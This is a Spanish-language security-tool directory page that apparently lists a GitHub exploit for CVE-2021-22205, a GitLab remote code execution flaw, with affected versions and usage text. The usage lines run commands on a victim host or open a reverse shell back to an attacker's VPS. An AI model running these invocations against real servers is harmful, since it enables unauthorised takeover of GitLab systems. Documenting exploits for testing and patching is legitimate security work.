Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-22205 — CVE-2021-22205 script de detección, compatible con getshell y ejecución de comandos | Kitploit
Herramientas/GitHubGitHub/keven1z/cve-2021-22205
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

CVE-2021-22205 script de detección, compatible con getshell y ejecución de comandos

Ver Repositorio
123hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-22205

Debido a que GitLab no valida correctamente los archivos de imagen enviados al analizador de archivos, se produce una ejecución de comandos. Un atacante puede construir una solicitud maliciosa para explotar esta vulnerabilidad y ejecutar comandos arbitrarios en el sistema objetivo, lo que finalmente permite controlar el servidor GitLab. Dado que la mayoría de los scripts públicos carecen de funcionalidad de reverse shell, se ha modificado el script disponible en línea para añadir una función de getshell con un solo clic.

Versiones afectadas

  • 11.9 <= GitLab (CE/EE) < 13.8.8
  • 13.9 <= GitLab (CE/EE) < 13.9.6
  • 13.10 <= GitLab (CE/EE) < 13.10.3

Instrucciones de uso

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL objetivo
  -c COMMAND, --command COMMAND
                        Comando a ejecutar
  --shell               Si se debe obtener una reverse shell
  -i IP, --ip IP        IP de la reverse shell
  -p PORT, --port PORT  Puerto de la reverse shell

Uso

root@kitploit:~
python3 CVE-2021-22205.py -t [ip víctima] --shell -i [ip vps] -p [puerto vps]  # Reverse shell
python3 CVE-2021-22205.py -t [ip víctima] -c [comando]  # Ejecutar comando

Declaración

Este script es únicamente para fines de prueba, no lo utilice para otros fines.

Descargar herramienta